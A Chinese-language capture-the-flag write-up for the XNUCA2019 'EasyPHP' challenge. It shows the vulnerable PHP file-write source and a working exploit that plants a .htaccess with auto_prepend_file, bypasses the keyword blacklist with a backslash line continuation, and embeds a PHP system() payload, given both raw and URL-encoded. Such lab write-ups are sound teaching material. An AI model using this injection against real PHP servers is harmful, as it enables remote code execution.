# [XNUCA2019Qualifier]EasyPHP
源码:
<?php | |
$files = scandir('./'); | |
foreach($files as $file) { | |
if(is_file($file)){ | |
if ($file !== "index.php") { | |
unlink($file); | |
} | |
} | |
} | |
include_once("fl3g.php"); | |
if(!isset($_GET['content']) || !isset($_GET['filename'])) { | |
highlight_file(__FILE__); | |
die(); | |
} | |
$content = $_GET['content']; | |
if(stristr($content,'on') || stristr($content,'html') || stristr($content,'type') || stristr($content,'flag') || stristr($content,'upload') || stristr($content,'file')) { | |
echo "Hacker"; | |
die(); | |
} | |
$filename = $_GET['filename']; | |
if(preg_match("/[^a-z\.]/", $filename) == 1) { | |
echo "Hacker"; | |
die(); | |
} | |
$files = scandir('./'); | |
foreach($files as $file) { | |
if(is_file($file)){ | |
if ($file !== "index.php") { | |
unlink($file); | |
} | |
} | |
} | |
file_put_contents($filename, $content . "\nJust one chance"); | |
?> |
分析:
文件清理:代码首先扫描当前目录中的文件,然后尝试删除除index.php之外的所有文件。
包含外部文件:它包含一个名为的文件fl3g.php。
输入验证:检查URL 中的参数content(黑名单:on,html,type,flag,upload,file)。filename(匹配任何不是小写字母(a-z)和点(.)的字符)
安全检查:它进行检查以防止某些模式content并验证filename。
最终文件写入:如果所有检查都通过,它会将其写入content指定内容filename并附加“仅一次机会”。
文件名有。和字母的就可以想到配置文件,并且写的东西 content 还没有过滤
首选.htaccess 文件(方法很多:https://xz.aliyun.com/t/8267?time__1311=n4%2BxnD0Dc7exyDjxYqGNWPtsAYY5GO4rlWReD#toc-6):
最简单的就是 php_value 方法:(file 被禁了可以用 \ 绕过)
?content=php_value auto_prepend_fi\
le .htaccess
#<?php system('cat /fl*');?>\&filename=.htaccess
url 编码一下:
?content=php_value%20auto_prepend_fi%5C%0Ale%20.htaccess%0A%23%3C%3Fphp%20system('cat%20%2Ffl*')%3B%3F%3E%5C&filename=.htaccess
直接回 index.php 看 flag
参考链接:https://blog.csdn.net/shinygod/article/details/129338836
